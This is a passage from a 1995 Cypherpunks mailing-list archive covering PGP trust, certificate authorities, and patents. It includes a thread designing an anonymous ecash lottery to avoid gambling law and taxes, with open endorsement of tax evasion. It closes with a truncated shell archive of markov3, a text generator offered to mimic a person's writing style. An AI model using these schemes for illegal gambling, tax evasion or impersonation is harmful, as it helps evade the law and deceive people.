COMPLETE AN ACCURATE SEARCH. Gee: Someone who has not learnt to use the caps key on his computer cannot do accurate searches, so will everyone else please get off the net. > > [...] > > BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE > PLACING ON THE WEB. 
Pleasant comic relief. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From anon-remailer at utopia.hacktic.nl Wed Nov 29 17:09:32 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Thu, 30 Nov 1995 09:09:32 +0800 Subject: Elliptic curves, patent status? In-Reply-To: <199511290717.XAA29808@blob.best.net> Message-ID: <199511300051.BAA26198@utopia.hacktic.nl> Wei Dai (weidai at eskimo.com) wrote: > On Mon, 27 Nov 1995, James A. Donald wrote: > > > > [are there patents that cover all public key cryptography?] > > > > No, but RSA will litigate you with the objective of > > inflicting extravagant legal costs regardless. > > RSADSI no longer owns the Stanford patents (Hellman-Merkle, > Diffie-Hellman) which they used to claim covered all public key > cryptography. Those patents now belong to Cylink, who seems to be less > litigious. Especially considering that they might lose the patents in a court case next month. From iagoldbe at calum.csclub.uwaterloo.ca Wed Nov 29 17:46:39 1995 From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) Date: Thu, 30 Nov 1995 09:46:39 +0800 Subject: ecash lottery (Was: ecash casino) In-Reply-To: <199511291640.IAA28114@infinity.c2.org> Message-ID: <49j0sq$a69@calum.csclub.uwaterloo.ca> In article <199511291640.IAA28114 at infinity.c2.org>, sameer wrote: > Any enterprising cypherpunks in gambling-friendly >jurisdictions interested? I figure it would make ecash take off.. and >you'd get rich. > Does anyone know what jurisdictions allow lotteries/gambling? Here's an off-the-cuff idea: [Disclaimer: The following post is a gedanken experiment.
It should not be interpreted as condoning or encouraging anyone to break any laws, no matter how stupid the laws are.] Anonymous email lotteries: Advertise the lottery (and include a public PGP key) through some remailer in one of the above jurisdictions. Use a remailer that allows pseudonymous replies. In the announcement, include a secure hash of the next drawing's winning number (appended to appropriate amounts of random noise). Advertise to a mailing list or a newsgroup, like alt.anonymous.lotteries.announce. People pay by sending: { A payment made out to "@" (the ecash wildcard) Their choice of lottery ticket number A PGP Public key } encrypted with the lottery's public key, to the remailer address. A lottery consists simply of displaying the winning number and random noise, whose hash was previously posted (so the participants know you're not cheating). Now: there's likely no Web-of-Trust to the various PGP keys involved, so the lottery's Reputation will have to be built up. A good way to do this is to have smaller prizes being won fairly often (e.g. by matching the last digit/few bits), so that it's obvious the lottery is not just collecting money without awarding prizes. The lottery pays out by replying to the winner's pseudonymous messages with their payment (made out to "@"), encrypted with their PGP key. There can be other variants on the lottery. For example, the participant whose ticket is _closest_ to the winning number wins all the money in the pot (minus a cut for the house). A problem with this, and various other forms of the lottery, is that it's hard for the lottery to prove that it's not cheating (either in the amount of money it took in, or that the losers of the lottery actually lost, etc.). In this model of payment, no participant knows anything about any other participant except a remailer's Reply-Block, and a PGP public key. 
However, using the features of ecash (from what I know of how it works, which isn't all that much (yet)), a payer can, in collaboration with the bank, identify the payee. This may be undesirable for the lottery operator and/or the participants. If (when) details of ecash are published (by Digicash or by someone else), it would likely be easier to work out how to achieve all-way anonymity with ecash. I seem to recall some mention of how this would be done here a while ago, and Lucky said he was going (before he started working for them) "to write some scripts that will lay the groundwork for some of the more unusual applications of Ecash". Follow-up thought: The lottery operator, instead of depositing the coins he receives from the participants, stockpiles them, and forwards them on to the winner(s). If a participant complains to the bank, and the bank traces his payment, it is likely to merely identify another participant (who is not doing anything illegal, AFAIK (IANAL; it's illegal to _run_ this sort of thing inside the US, not to _play_ it, right?)), and the lottery owner can even claim he is merely a participant, in the chance event that he _is_ the one identified, and he happens to be in the US... As far as I can tell, then, with this sort of method, the only way the lottery operator could be caught (technically; he could be caught in non-technical ways, say by being overheard bragging about it (Don't laugh; it's been done.)) is by having the remailer (or remailer chain) compromised. So; is there a problem with the implementation outlined above? If it were implemented, would people play it? 
- Ian "Still not sure he wants to get an ecash account" From frantz at netcom.com Wed Nov 29 18:33:15 1995 From: frantz at netcom.com (Bill Frantz) Date: Thu, 30 Nov 1995 10:33:15 +0800 Subject: The future will be easy to use Message-ID: <199511290808.AAA14767@netcom2.netcom.com> At 15:30 11/28/95 -0500, Carl Ellison wrote: >BTW -- PGP currently lacks a way for me to note, when I sign a key, how it >is that I trust that key (by personal meeting, by attribution, by message >association, ...). A signed attribute record would let me record that >information for myself as well as for others. There is more to this problem than how it is that I trust the key. There is also what I trust it for. I just added a key to my key ring that I will use for sending confidential data to a client site. I trust that no one can access the secret key who is not also inside their firewall. However, the key is on a multi-user system, so I do not trust that it is accessible to only one person. Since the data I intend to send will be publicly available inside the firewall, I don't have to trust more than the firewall. It is hard to see how to record the information about how much I trust the recipient's systems security. Bill ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From eay at mincom.oz.au Wed Nov 29 18:34:37 1995 From: eay at mincom.oz.au (Eric Young) Date: Thu, 30 Nov 1995 10:34:37 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: On Tue, 28 Nov 1995, Jonathan Zamick wrote: > Returning to the original topic though, do we want to get a smaller list > together to spec out some ideas for the project that was discussed? A > simple, transparent, tool which would allow people to use strong encryption > without having to think about it?
It should be worth noting that I hope to put out the next version of SSLeay in less than a week (I hope, depending on how many nights I don't sleep :-) and it should include a 'demo' CA application. It will probably only use simple text indexes and directories for storage but I intend it to be able to generate CRL and process certificate requests. The only question is do I put in support to output the certificate using a netscape/verisign compatible format :-). If nothing else, this should be a good starting point for adding a nice GUI front end and a real database backend. The application will be mostly a front-end to the SSLeay library so if I finish most of my documentation by then, others should be able to write a real CA application. eric -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From anonymous-remailer at shell.portal.com Wed Nov 29 19:01:06 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 30 Nov 1995 11:01:06 +0800 Subject: key for Alice as promised (not) Message-ID: <199511300232.SAA22068@jobe.shell.portal.com> On Wed, 29 Nov 1995, Adam Shostack wrote: > > PGP is really not the issue. The issue is more my security and the > > environment that I use PGP in. I don't have a trusted machine to run PGP > > on. Anyone who wants to can come up to machine and copy my secret keyring > > or they can even watch me typing my password in. > > Threat, please?? Do people often stand over your shoulder as > you type? Yes. > Enter your office, Yep, especially my night cleaning staff. > point guns at you, Not recently ... I'd co-operate fully in that situation, though. > and take a backup of your entire computer? You mean like the on-site backups that I have in the filing cabinet beside me, or the off-site backups that aren't here (in case of fire, or such) and are completely outside my control?
> Have you considered putting the secret keyring > on a floppy and locking it in your desk/safe when you're not actually > in the office? (Or home..) Yep, I've considered it. It's still not all that helpful. Cleaning staff has plenty of time when I'm not around to deal with that. > > So, I don't fool myself, and I don't use PGP, except for things like > > exchanging a one-time pad with someone when I've already sent the message > > out across another delivery mechanism, like on a floppy delivered by > > courier. > > I don't follow. You're claiming that PGP is good enough to > transfer OTPads, but not good enough to sign pseudonymous messages? Sure. Two different situations. If I take a message or a data tape and encrypt it with a one time pad. And then I send the message out to someone via Greyhound or DHL. And once they've confirmed that they have the encrypted message safely in hand, then I'll call them and ask them to call me with their public key delivered by voice via telephone. Which I then use to encrypt the one-time-pad, using the PGP key only once. Then, I'm comfortable sending it (not the message, but the pad) over the Internet encrypted with PGP. And I think at that point, I have Pretty Good Privacy. > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From adam at lighthouse.homeport.org Wed Nov 29 19:55:38 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 30 Nov 1995 11:55:38 +0800 Subject: key for Alice as promised (not) (fwd) Message-ID: <199511300318.WAA16662@homeport.org> >On Wed, 29 Nov 1995, Adam Shostack wrote: > >> > PGP is really not the issue. The issue is more my security and the >> > environment that I use PGP in. I don't have a trusted machine to run PGP >> Threat, please?? Do people often stand over your shoulder as >> you type? > >Yes.
And you can't ask them to leave, as you send anonymous messages? Or does your whole office know you're one of those who post to cypherpunks as Alice d' nonymous? >> Have you considered putting the secret keyring >> on a floppy and locking it in your desk/safe when you're not actually >> in the office? (Or home..) > >Yep, I've considered it. It's still not all that helpful. Cleaning >staff has plenty of time when I'm not around to deal with that. Of course, if the cleaning staff cut your safe open, you have a good indication of that in the morning. Not that you've demonstrated that the level of effort to do all of this at all equates to what is gained, namely, the ability to impersonate you. Which everyone in the world has today. >> > So, I don't fool myself, and I don't use PGP, except for things like >> > exchanging a one-time pad with someone when I've already sent the message >> > out across another delivery mechanism, like on a floppy delivered by >> > courier. >> >> I don't follow. You're claiming that PGP is good enough to >> transfer OTPads, but not good enough to sign pseudonymous messages? > >Sure. Two different situations. [...] >And once they've confirmed that they have the encrypted message safely in >hand, then I'll call them and ask them to call me with their public key >delivered by voice via telephone. >Which I then use to encrypt the one-time-pad, using the PGP key only once. > >Then, I'm comfortable sending it (not the message, but the pad) over the >Internet encrypted with PGP. And I think at that point, I have Pretty >Good Privacy. Of course, then your message only has 128 bits of security, because the Greyhound or DHL employee could be easily compromised, as could the message in their office. So you encrypt the pad with IDEA, getting you IDEA level security, and think you're working with one time pads?? I'm flabbergasted. From tcmay at got.net Wed Nov 29 20:01:20 1995 From: tcmay at got.net (Timothy C.
May) Date: Thu, 30 Nov 1995 12:01:20 +0800 Subject: ecash lottery (Was: ecash casino) Message-ID: At 1:20 AM 11/30/95, Ian Goldberg wrote: >[Disclaimer: The following post is a gedanken experiment. It should not > be interpreted as condoning or encouraging anyone to break any > laws, no matter how stupid the laws are.] I, on the other hand, have no compunctions about "condoning or encouraging" various kinds of actions. When condoning and encouraging becomes criminal, I hope I'll be gone. (Wiseacres will cite hypos in which encouraging a crime, such as a rape, makes the encouragers culpable. A far cry from condoning and encouraging tax evasion, gambling, etc.) On to Ian's proposal: ... >Now: there's likely no Web-of-Trust to the various PGP keys involved, >so the lottery's Reputation will have to be built up. A good way to >do this is to have smaller prizes being won fairly often (e.g. by matching >the last digit/few bits), so that it's obvious the lottery is not just >collecting money without awarding prizes. Have to be _very_ careful here. A variety of scams can be developed which show lots of "small" winners, but which fail to show any large winners. The lottery operators can make a lot of extra bucks by simply not paying off the large winnings, in various ways. More robust protocols may be possible. In particular, I recall that Eric Hughes was working on something he called "encrypted open books." While banking was the obvious domain, it seems plausible that the same methodologies could be adapted for lotteries (some isomorphisms between accounts/balances and tickets/winnings?). I don't follow Ian's proposal in enough detail to comment on it, but thought I should point out the scams over nonpayment of winnings and the "encrypted open books" notions (from sometime in '93, as I recall). Personally, I have long had great _hopes_ for using crypto for non-sanctioned gambling, but I'm pretty skeptical that many people will do it. 
For one thing, anyone knowledgeable enough to be comfortable with the cryptography knows that gambling when a house cut exists is a lose. (And gambling with no house cut is, at best, a wash.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From pete at loshin.com Wed Nov 29 20:04:30 1995 From: pete at loshin.com (Pete Loshin) Date: Thu, 30 Nov 1995 12:04:30 +0800 Subject: ecash lottery (Was: ecash casino) Message-ID: <01BABEA9.4771C9E0@ploshin.tiac.net> Ian Goldberg wrote: > >Here's an off-the-cuff idea: > >[Disclaimer: The following post is a gedanken experiment. It should not > be interpreted as condoning or encouraging anyone to break any > laws, no matter how stupid the laws are.] > >Anonymous email lotteries: [details deleted] >A lottery consists simply of displaying the winning number and random >noise, whose hash was previously posted (so the participants know >you're not cheating). Traditional illegal numbers rackets usually use some publicly available number so everyone knows it's all on the up and up (I used to know what the source for the winning numbers actually _is_, though I think it has something to do with the stock market, e.g., the last three digits of the number of oddlot trades, or something else that is usually essentially random. In any case, using such a "public" and daily number eliminates the problem of proving the game isn't fixed.
-Pete Loshin pete at loshin.com From jsw at netscape.com Wed Nov 29 20:25:53 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 30 Nov 1995 12:25:53 +0800 Subject: Certificate Authorities? In-Reply-To: <01BABCAF.9CDAE5C0@csasaki> Message-ID: <30BBB178.267A@netscape.com> We are looking at adding the ability for enterprise security administrators to lock various parts of the Navigator configuration so that the user can not change them, including stuff relating to trust and certificates. This functionality will not be in 2.0, but we do consider it important for certain customers. --Jeff P. Rajaram wrote: > Yes. But... > I deal with the security infrastructure for a large corporation. > I want only security administrators to configure the list of acceptable CAs. > I specifically do not want our users to be able to add new CAs > to the list of trusted "approved" CAs. > > The concern is that some users who are not crypto enthusiasts may be > "social engineered" into adding a very liberal CA to their list. > Once this happens, the browser's signature verification capability > is totally compromised. > > This is one of the reasons why PGP has not been adopted by many large > companies. In response, Viacrypt now seems to have a product that > can restrict user modifications to the public keyring. > > -raj -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From tcmay at got.net Wed Nov 29 20:30:53 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 30 Nov 1995 12:30:53 +0800 Subject: ecash lottery (Was: ecash casino) Message-ID: At 2:00 AM 11/30/95, Dr. Dimitri Vulis wrote: >iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) writes: >> So; is there a problem with the implementation outlined above? > >What about the income tax on winnings? That's a good one! A bit subtle as humor, though. 
(For many of us, even most of us, the whole _attraction_ of such gambling schemes--to the extent any gambling scheme can ever be attractive to a rational person--is the tax avoidance. And any scheme that allows taxation of winnings, but not losses on individual bets, would kill this proposal dead.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Wed Nov 29 20:42:13 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 30 Nov 1995 12:42:13 +0800 Subject: Fertile ground for papers.... Message-ID: At 3:22 AM 11/30/95, Pete Loshin wrote: >In any case, using such a "public" and daily number >eliminates the problem of proving the game isn't fixed. Maybe. In passing, the whole field of cryptography is filled with interesting papers with titles like "How to toss a fair coin over the telephone" and "Avoiding double spenders in digital money systems." Meaning, how robust cryptographic protocols can be used to avoid scams familiar to the most junior grifter. The theme of "proving anonymous betting schemes are not fixed" is in the same vein, and could establish the reputation of any budding Amos Fiats or David Chaums out there. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hroller at c2.org Wed Nov 29 21:17:05 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Thu, 30 Nov 1995 13:17:05 +0800 Subject: Your faith is PGP is charming and quaint, but wrong Message-ID: <199511300446.UAA19851@infinity.c2.org> All of these articles from people claiming to be me! I repeat, for the slow learners, that I consider PGP to be untrustworthy, at least on my machines. I don't want those Mounties to do to me what they did to Mulroney en passant. You in the southern colony are free to use PGP, but I prefer other means of establishing my uniqueness. Style, for example, cannot be easily copied. I am, as always, Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. I. A. M. A. M. O. R. O. N. From mjsus at atlanta.com Wed Nov 29 21:25:48 1995 From: mjsus at atlanta.com (mjsus at atlanta.com) Date: Thu, 30 Nov 1995 13:25:48 +0800 Subject: GOST for sale Message-ID: <199511300458.XAA08306@atlanta.com> >> > I have non-commercial demo version of the product (370 Kb arjed > distributive) and I can send it to people who will be interested in it. > Please, send it to me. Thanks. Mark From rsalz at osf.org Wed Nov 29 21:32:02 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 30 Nov 1995 13:32:02 +0800 Subject: Your faith is PGP is charming and quaint, but wrong Message-ID: <9511300504.AA18396@sulphur.osf.org> >Style, for example, cannot be easily copied. Au contraire. Cypherpunks share code... #! /bin/sh # This is a shell archive. Remove anything before this line, then feed it # into a shell via "sh file" or similar. To overwrite existing files, # type "sh file -c".
# The tool that generated this appeared in the comp.sources.unix newsgroup; # send mail to comp-sources-unix at uunet.uu.net if you want that tool. # Contents: Makefile PATCHLEVEL README markov3.6 markov3.l # Wrapped by rsalz at sulphur on Thu Nov 30 00:04:29 1995 PATH=/bin:/usr/bin:/usr/ucb ; export PATH echo If this archive is complete, you will see the following message: echo ' "shar: End of archive."' if test -f 'Makefile' -a "${1}" != "-c" ; then echo shar: Will not clobber existing file \"'Makefile'\" else echo shar: Extracting \"'Makefile'\" \(53 characters\) sed "s/^X//" >'Makefile' <<'END_OF_FILE' X Xmarkov3: markov3.o X $(CC) -o $@ $(CFLAGS) markov3.o END_OF_FILE if test 53 -ne `wc -c <'Makefile'`; then echo shar: \"'Makefile'\" unpacked with wrong size! fi # end of 'Makefile' fi if test -f 'PATCHLEVEL' -a "${1}" != "-c" ; then echo shar: Will not clobber existing file \"'PATCHLEVEL'\" else echo shar: Extracting \"'PATCHLEVEL'\" \(2 characters\) sed "s/^X//" >'PATCHLEVEL' <<'END_OF_FILE' X1 END_OF_FILE if test 2 -ne `wc -c <'PATCHLEVEL'`; then echo shar: \"'PATCHLEVEL'\" unpacked with wrong size! fi # end of 'PATCHLEVEL' fi if test -f 'README' -a "${1}" != "-c" ; then echo shar: Will not clobber existing file \"'README'\" else echo shar: Extracting \"'README'\" \(2400 characters\) sed "s/^X//" >'README' <<'END_OF_FILE' XThis is a cleaned-up reposting of the markov3 program. The following Xchanges have been made: X XThe null pointer dereferencing bugs have been fixed (I hope). X XThe code that uses "rand" should now be portable (the patches posted Xto the net to fix this problem were wrong, they break the code on Xsome machines in order to fix it on others. I stole some code from X"hack" to do things right. If hack works for you, this should). X Xmarkov3 now understands "notes" cruft (thanks to Rich Salz). X XBecause of the 50% rule in news 2.11, people often use some other Xcharacter than ">" for inclusions. 
markov3 assumes that lines Xbeginning with any of X X > < ) | # } ] X Xare inclusions (without this rule, funny-looking output results if Xanyone uses non-standard "quoting"). X XThe random number generator is initialized using the time, if neither Xthe -s flag nor the new -x flag is given. X XThis will be the last complete posting; a "patchlevel" file is included Xand I will send out patches if there are further bugs or improvements. X XHere's the original README. X--------------------------------------------------------------------------- XI created a bit of a stir with this program in December 1986 when I Xused an earlier version of it to simulate a certain well-known net Xpersonality (Hi Laura!). It digests Usenet articles and spits out Xother articles with similar characteristics. You need lex to run it, Xbut otherwise it should run on any Unix I know of. X XI had several requests for the program but didn't consider it X"ready". It's as ready as it will ever be now. X XThe program uses getopt(3). There are several public-domain versions Xavailable for Berkeley systems from the mod.sources archives. Since Xit's small, I've included Henry Spencer's version, but you'll have Xto change the Makefile to use it. X XFor best results, feed it at least ten articles by the same person Xor on the same subject. If there are fewer articles the output Xresembles the original too much; if there is too much variety in Xthe articles the output is more incoherent than it otherwise is. X XThe program requires lots of memory if it is given lots of input; Xthe small-model people will have problems. X XPlease don't post the output to the net (though I'd be happy to Xsee some of the more interesting results). X XSend comments, suggestions for improvement, fan mail, and flames Xto me: {sun,hplabs,ames,ihnp4}!oliveb!epimass!jbuck. END_OF_FILE if test 2400 -ne `wc -c <'README'`; then echo shar: \"'README'\" unpacked with wrong size! 
fi # end of 'README' fi if test -f 'markov3.6' -a "${1}" != "-c" ; then echo shar: Will not clobber existing file \"'markov3.6'\" else echo shar: Extracting \"'markov3.6'\" \(2503 characters\) sed "s/^X//" >'markov3.6' <<'END_OF_FILE' X.\" markov3 X.\" @(#)markov3.6 1.1 3/6/87 epimass!jbuck X.TH MARKOV3 6 "3/6/87" X.UC 4 X.SH NAME Xmarkov3 \- Digest and spit out quasi-random Usenet articles X.SH SYNOPSIS X.B markov3 X[ X.B \-pv X] [ X.B \-n X.I n_articles X] [ X.B \-d X.I dumpfile X] [ X.B \-s X.I seed X] [ X.B \-x X] Xfiles X.SH DESCRIPTION X.PP X.I Markov3 Xdigests Usenet articles and builds an internal data structure that Xmodels the articles as if they came from a random process, where Xeach word is determined by the previous two. It then emits a series Xof articles on the standard output that have the same distribution Xof words, word pairs, and word triplets as do the input files. XThe name X.I markov3 Xcomes from the fact that this structure is called a Markov chain, Xand that the statistics for word triplets are modeled. XHere, a "word" is a sequence of printable characters surrounded by Xwhitespace. Paragraph breaks (blank lines) are also treated as a X"word". Paragraphs of included text are treated as single "words" Xand printed as "> ...". X.PP XBy default, the program expects to be fed Usenet articles; it strips Xoff headers, included text, and signatures (or at least it tries). XThe X.B \-p X(plain) option disables the header-stripping feature (otherwise Xeverything is skipped until a blank line is encountered). X.PP XBy default, 10 articles, separated by form feeds, are written on the Xstandard output. The X.B \-n Xoption lets you specify a different number. X.PP XThe X.B \-x Xoption does not seed the random number generator; this is useful Xfor simulating people who repeat themselves. X.PP XThe X.B \-d X(dump) option dumps a representation of the internal data structure Xbuilt by X.I markov3 Xon the named file. 
X.PP
XFinally, the
X.B \-v
X(verbose)
Xoption prints some statistics on the standard error.
X.SH "CAVEATS"
XThis program allocates lots of memory if given large amounts of input.
XOn virtual memory systems, the paging behavior is atrocious because
Xpointers tend to point every which way, and many pointers are dereferenced
Xfor every word processed. This could be improved, I'm sure.
X.PP
XPosting articles generated by
X.I markov3
Xto the net may be hazardous to your health.
X.PP
XNot as smart as Mark V. Shaney.
X.SH "PORTABILITY"
XAn effort has been made to make this program as portable as possible;
Xan earlier version was much less portable because of problems with
Xnull pointers and rand(3). Please let me know if you have further problems.
X.PP
XIf you don't have lex, you'll need to rewrite the lexical analyzer
Xbut most of the program is in C.
END_OF_FILE
if test 2503 -ne `wc -c <'markov3.6'`; then
    echo shar: \"'markov3.6'\" unpacked with wrong size!
fi
# end of 'markov3.6'
fi
if test -f 'markov3.l' -a "${1}" != "-c" ; then
    echo shar: Will not clobber existing file \"'markov3.l'\"
else
echo shar: Extracting \"'markov3.l'\" \(11822 characters\)
sed "s/^X//" >'markov3.l' <<'END_OF_FILE'
X%{
X/*
X * Copyright (c) 1986, 1987 by Joe Buck
X *
X * Permission is granted to use, redistribute, or modify this program,
X * as long as you don't pretend you wrote it. Send improvements or
X * bug reports to {ihnp4,hplabs,ames,sun}!oliveb!epimass!jbuck.
X *
X * The program generates simulated Usenet articles, given Usenet articles
X * as input.
X *
X * This program constructs a table of frequencies for a token appearing,
X * given the two preceding tokens. A "token" is a sequence of non-blank
X * characters. An entirely blank line is also treated as a token, as is
X * the beginning and end of an article.
X *
X * The program is designed to process news articles, rejecting text from
X * the header, signature, and included text, together with cruft inserted
X * by rn and notes.
A paragraph of included text is treated like a token.
X *
X * After the table is built (and it can be big), articles are generated
X * on the standard output.
X */
X#ifndef lint
Xstatic char *sccs_id = "@(#)markov3.l 1.1 3/6/87 epimass!jbuck";
X#endif
X#include /* for time_t */
Xint in_included_text = 0;
X#ifdef yywrap
X#undef yywrap
X#endif
X%}
X%Start HDR BODY SIG
X%%
X^[^ \t]+:.*\n ; /* Header line, e.g. "From: foo at bar.UUCP" */
X^[ \t]+[^ \t].*\n ; /* Continuation of header line */
X^[ \t]*$ BEGIN BODY;
X^"-- "$ BEGIN SIG;
X^[><)|#}].*\n { /* 50% rule gets people to change ">"
X        to other characters; this gets most of them */
X        if (!in_included_text) {
X            in_included_text = 1;
X            process_token ("\n> ...\n\n");
X        }
X    }
X"]".*\n { /* should have been included in the above. My
X        lex generates bad C code if I say [[><...]
X        even though ed(1) says that's a valid regular
X        expression. */
X        if (!in_included_text) {
X            in_included_text = 1;
X            process_token ("\n> ...\n\n");
X        }
X    }
X^"In article".*\n ; /* Reject rn crud */
X^"/* Written".*"*/"\n ; /* Also NOTES crud */
X^"/* End of text from".*"*/"\n ; /* NOTES */
X^"/* ----------".*"----------*/"\n ; /* NOTES */
X[ \t]+ ; /* Skip white space */
X\n[ \t\n]*\n { process_token ("\n"); /* Paragraph break */}
X^\..* ; /* Ignore format directives. */
X[^ \t\n]+ { in_included_text = 0; process_token (yytext); }
X. ; /* Eat anything that escaped */
X\n ;
X\n ;
X. ;
X\n ;
X%%
Xextern int optind;
Xextern char *optarg;
X
X/*
X * hashtab is a hash table storing all the tokens we encounter.
X */
Xstruct htentry {
X    char *htext;
X    struct htentry *hlink;
X};
X
X#define HSIZE 3557 /* Should be prime */
X#define Fprintf (void)fprintf
X#define Printf (void)printf
X
Xstruct htentry hashtab[HSIZE];
X
X/*
X * node and succnode are portions of the big structure we're going to build.
X * node represents something like ("was", "a") in a binary tree.
X * a linked list of succnodes contain tokens that may follow ("was", "a")
X */
Xstruct node {
X    char *text;
X    char *text2;
X    int ocount;
X    struct node *lc, *rc;
X    struct succnode *succ;
X};
X
Xstruct succnode {
X    struct node *scnod;
X    int count;
X    struct succnode *link;
X};
X
X
Xstruct node *prev_code = NULL;
Xchar *prev_token = NULL, **Argv;
Xint init_state = HDR;
Xint verbose = 0;
Xstruct node *root = NULL, *tknptr;
Xstruct succnode *start = NULL;
Xint n_pairs = 0, n_tokens = 0, n_files = 0, n_total = 0;
X
Xstruct node *insert_token();
Xchar *savetoken();
X
Xprocess_token (txt)
Xchar *txt;
X{
X    struct node *code;
X    char *token = savetoken (txt);
X/* We have a new token. Say the previous two tokens were "one" "way"
X * and the current token is "to". Then prev_code points to a node
X * for ("one", "way") and token is "to". This function adds ("way", "to") as a
X * successor to ("one","way") and makes prev_code point to ("way","to").
X */
X    code = insert_token (prev_token, token);
X    insert_pair (prev_code, code);
X    prev_code = code;
X    prev_token = token;
X    return;
X}
X
X/*
X * here it is, the main function.
X */
Xmain (argc, argv)
Xint argc;
Xchar **argv;
X{
X    int i, c, n_articles = 10, sflag = 0;
X    char *dumpfile = NULL;
X    extern int optind;
X    extern char *optarg;
X
X    while ((c = getopt (argc, argv, "pxvn:d:s:")) != EOF) {
X        switch (c) {
X        case 'v':
X            verbose = 1;
X            break;
X        case 'p': /* Input is plain text, not Usenet stuff */
X            init_state = BODY;
X            break;
X        case 'n': /* # articles to generate */
X            n_articles = atoi (optarg);
X            break;
X        case 'd': /* where to dump the data structure */
X            dumpfile = optarg;
X            break;
X        case 's': /* Set the seed for rand; fall through */
X            srand (atoi (optarg));
X        case 'x': /* set flag to prevent srand */
X            sflag++;
X            break;
X        default:
X            Fprintf (stderr,
X             "Usage: markov3 [-pvx] [-s seed] [-n n_art] [-d dump] files\n");
X            exit (1);
X        }
X    }
X    BEGIN init_state; /* initial state of lexical analyzer */
X    if (!sflag) /* set random number generator */
X        srand ((int)time ((time_t *)0));
X/* Note: if optind == argc, there are no file arguments. yyin is left
X * initialized to stdin.
X */
X    if (optind < argc) {
X/* yyin is lex input stream. Point to first file. */
X        if ((yyin = fopen (argv[optind], "r")) == NULL) {
X            perror (argv[optind]);
X            exit (1);
X        }
X        optind++; /* skip to next file */
X    }
X    Argv = argv; /* make it global so yywrap can access it */
X    n_files = 1;
X/* yylex puts all the input files through the lexical analyzer and builds
X * the database.
X */
X    (void) yylex ();
X    if (dumpfile)
X        dump_database (dumpfile);
X    if (verbose)
X        Fprintf (stderr,
X         "Total of %d tokens (%d different), %d different pairs, %d files\n",
X         n_total, n_tokens, n_pairs, n_files);
X/* Generate the articles, separated by form feeds */
X    for (i = 0; i < n_articles; i++) {
X        if (i > 0) output_word ("\n\f\n");
X        generate_article ();
X    }
X    return 0;
X}
X
X/*
X * Lex calls this when EOF is reached. It opens the next file if there
X * is one. Lex interprets a return value of 1 to mean "all done" and 0
X * to mean "keep going".
X */
Xyywrap () {
X    (void) fclose (yyin);
X    insert_pair (prev_code, (struct node *)0);
X    prev_code = NULL;
X    if (Argv[optind] == NULL) return 1;
X    else if ((yyin = fopen (Argv[optind], "r")) == NULL) {
X        perror (Argv[optind]);
X        exit (1);
X    }
X    optind++;
X    in_included_text = 0;
X    if (verbose && n_files % 10 == 0)
X        Fprintf (stderr, "%d files\n", n_files);
X    n_files++;
X    BEGIN init_state;
X    return 0;
X}
X
X/*
X * This function saves a token in the hash table (if it isn't there
X * already) and returns a pointer to the stored copy.
X */
Xchar *
Xsavetoken (txt)
Xchar *txt;
X{
X    int h;
X    char *p;
X    struct htentry *hp;
X
X    n_total++;
X    for (p = txt, h = 0; *p; h += *p++);
X    hp = hashtab + (h % HSIZE);
X    while (hp->hlink) {
X        if (strcmp (hp->htext, txt) == 0) {
X            return hp->htext;
X        }
X        hp = hp->hlink;
X    }
X/* OK, it's a new token. Make hp->hlink point to a new,
X * null block and make hp->htext point to the text.
X */
X    hp->hlink = (struct htentry *) malloc (sizeof *hp);
X    hp->htext = malloc ((unsigned)(strlen (txt) + 1));
X    (void) strcpy (hp->htext, txt);
X    hp->hlink->hlink = NULL;
X    hp->hlink->htext = NULL;
X    n_tokens++;
X    return hp->htext;
X}
X
X/*
X * This recursive function inserts a token pair into the tree.
X */
Xstruct node *
Xinsert_in_tree (p, txt, txt2)
Xstruct node *p;
Xchar *txt, *txt2;
X{
X    int cmp;
X    if (p == NULL) {
X/* Create a new node. */
X        p = (struct node *) malloc (sizeof *p);
X        p->text = txt;
X        p->text2 = txt2;
X        p->lc = p->rc = NULL;
X        p->succ = NULL;
X        p->ocount = 1;
X        tknptr = p;
X        n_pairs++;
